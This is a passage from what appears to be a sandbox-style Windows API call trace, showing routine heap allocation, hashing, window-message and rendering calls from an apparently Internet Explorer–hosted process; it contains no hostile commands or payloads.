0x0 [0168.629] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.629] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.629] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0168.629] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0168.629] HashData (in: pbData=0x9ee6bd0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.629] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.629] HashData (in: pbData=0x9ee6bd4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.629] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6bd0 | out: hHeap=0x5e0000) returned 1 [0168.629] GetFocus () returned 0x0 [0168.630] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197acf) returned 0 [0168.630] GetFocus () returned 0x0 [0168.630] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a8b) returned 0 [0168.630] GetFocus () returned 0x0 [0168.630] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a97) returned 0 [0168.630] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.630] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.630] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.631] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.631] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.631] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0168.632] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.632] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.632] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.632] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.632] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.632] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.632] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.633] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831c0 [0168.633] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.634] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.634] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.634] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.635] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0168.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0168.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831c0 | out: hHeap=0x5e0000) returned 1 [0168.639] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0168.639] LsSetDoc () returned 0x0 [0168.639] LsCreateLine () returned 0x0 [0168.640] LsDisplayLine () returned 0x0 [0168.642] LsDestroyLine () returned 0x0 [0168.642] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6af0 [0168.642] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0168.642] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0168.642] HashData (in: pbData=0x9f82f6c, cbData=0x4, pbHash=0x9f82f70, cbHash=0x2 | out: pbHash=0x9f82f70) returned 0x0 [0168.642] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.642] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.642] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.642] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.642] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.642] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.642] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.643] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.643] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0168.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0168.643] HashData (in: pbData=0x9ee6af0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.643] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.643] HashData (in: pbData=0x9ee6af4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6af0 | out: hHeap=0x5e0000) returned 1 [0168.643] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6bb0 [0168.643] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0168.643] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0168.643] HashData (in: pbData=0x9f82ffc, cbData=0x4, pbHash=0x9f83000, cbHash=0x2 | out: pbHash=0x9f83000) returned 0x0 [0168.643] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.644] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.644] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0168.644] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0168.644] HashData (in: pbData=0x9ee6bb0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.644] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.644] HashData (in: pbData=0x9ee6bb4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.645] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6bb0 | out: hHeap=0x5e0000) returned 1 [0168.645] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.646] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0168.646] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7c48 [0168.646] _CIsqrt () returned 0x407b027f [0168.646] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a40 [0168.646] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.646] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.646] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a40 | out: hHeap=0x5e0000) returned 1 [0168.646] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddf58 [0168.646] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.647] HashData (in: pbData=0xd94ea0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0168.647] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddf58 | out: hHeap=0x5e0000) returned 1 [0168.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6bf0 [0168.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0168.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7858 [0168.648] HashData (in: pbData=0x9f83194, cbData=0x4, pbHash=0x9f83198, cbHash=0x2 | out: pbHash=0x9f83198) returned 0x0 [0168.648] HashData (in: pbData=0x6d7858, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d785a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d785c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.648] HashData (in: pbData=0x6d7864, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d786c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d7874, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d7876, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d7878, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d7880, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.648] HashData (in: pbData=0x6d788c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.648] HashData (in: pbData=0x6d7894, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d78a0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.648] HashData (in: pbData=0x6d78a4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.648] HashData (in: pbData=0x6d78ac, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.648] HashData (in: pbData=0x6d78b8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.648] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7858 | out: hHeap=0x5e0000) returned 1 [0168.648] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0168.649] HashData (in: pbData=0x9ee6bf0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.649] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.649] HashData (in: pbData=0x9ee6bf4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.649] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6bf0 | out: hHeap=0x5e0000) returned 1 [0168.649] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.649] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.649] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.649] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.649] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.649] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.650] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0168.650] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.650] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.650] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.650] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.650] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.650] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.650] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.651] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0168.652] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.654] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.654] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.655] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.655] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.655] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ed8 [0168.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0168.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0168.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ed8 | out: hHeap=0x5e0000) returned 1 [0168.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68be38 | out: hHeap=0x5e0000) returned 1 [0168.741] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0168.741] BitBlt (hdc=0x51010a85, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0168.741] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0168.742] ReleaseDC (hWnd=0x103e2, hDC=0xb010541) returned 1 [0168.742] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098756114479) returned 1 [0168.743] DeleteObject (ho=0x25040a81) returned 1 [0168.743] GetCurrentThreadId () returned 0xb48 [0168.743] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0168.743] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098756253031) returned 1 [0168.744] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098756259467) returned 1 [0168.744] KillTimer (hWnd=0x30316, uIDEvent=0x2015) returned 1 [0168.744] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.744] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.744] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.744] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0168.744] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.745] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0168.745] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098756427371) returned 1 [0168.746] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0168.746] NtdllDefWindowProc_W () returned 0x0 [0168.747] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.747] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.747] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.747] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3098756601808) returned 1 [0168.748] SetEvent (hEvent=0x304) returned 1 [0168.751] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.751] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.751] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.751] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0168.751] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0168.751] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098757048484) returned 1 [0168.752] NtdllDefWindowProc_W () returned 0x0 [0168.752] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.752] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.752] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.752] KillTimer (hWnd=0x30316, uIDEvent=0x2018) returned 1 [0168.752] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3098757124861) returned 1 [0168.752] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098757135862) returned 1 [0168.752] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098757146247) returned 1 [0168.752] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098757152540) returned 1 [0168.753] SetEvent (hEvent=0x668) returned 1 [0168.754] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.754] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.754] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.754] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.754] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0168.754] GetCurrentThreadId () returned 0xb48 [0168.754] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.754] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.754] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.754] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.758] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.758] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.758] KillTimer (hWnd=0x30316, uIDEvent=0x2017) returned 1 [0168.758] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0171.956] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0171.956] NtdllDefWindowProc_W () returned 0x0 [0171.956] NtdllDefWindowProc_W () returned 0x0 [0171.956] NtdllDefWindowProc_W () returned 0x0 [0171.958] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0171.958] IsIconic (hWnd=0x103e0) returned 0 [0171.959] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0171.959] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0171.959] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0171.959] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0171.959] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0171.959] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0171.959] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0171.959] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x14040a78 [0171.959] GetUpdateRgn (hWnd=0x103e2, hRgn=0x14040a78, bErase=0) returned 1 [0171.959] DeleteObject (ho=0x14040a78) returned 1 [0171.959] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0171.959] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0171.960] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0171.960] NtdllDefWindowProc_W () returned 0x0 [0171.960] GetCurrentThreadId () returned 0xb48 [0171.960] GetCurrentThreadId () returned 0xb48 [0171.961] NtdllDefWindowProc_W () returned 0x0 [0171.963] NtdllDefWindowProc_W () returned 0x0 [0171.964] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0171.964] NtdllDefWindowProc_W () returned 0x0 [0171.964] NtdllDefWindowProc_W () returned 0x0 [0171.964] NtdllDefWindowProc_W () returned 0x0 [0171.964] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0171.964] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0171.965] NtdllDefWindowProc_W () returned 0x0 [0171.965] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0171.965] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0171.965] NtdllDefWindowProc_W () returned 0x1 [0171.969] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0171.969] GetFocus () returned 0x0 [0171.969] SetFocus (hWnd=0x103e2) returned 0x0 [0171.970] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0171.970] GetMessageTime () returned 30885828 [0171.970] GetMessagePos () returned 0x11e01d6 [0171.970] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x1, lParam=0xc000000f, 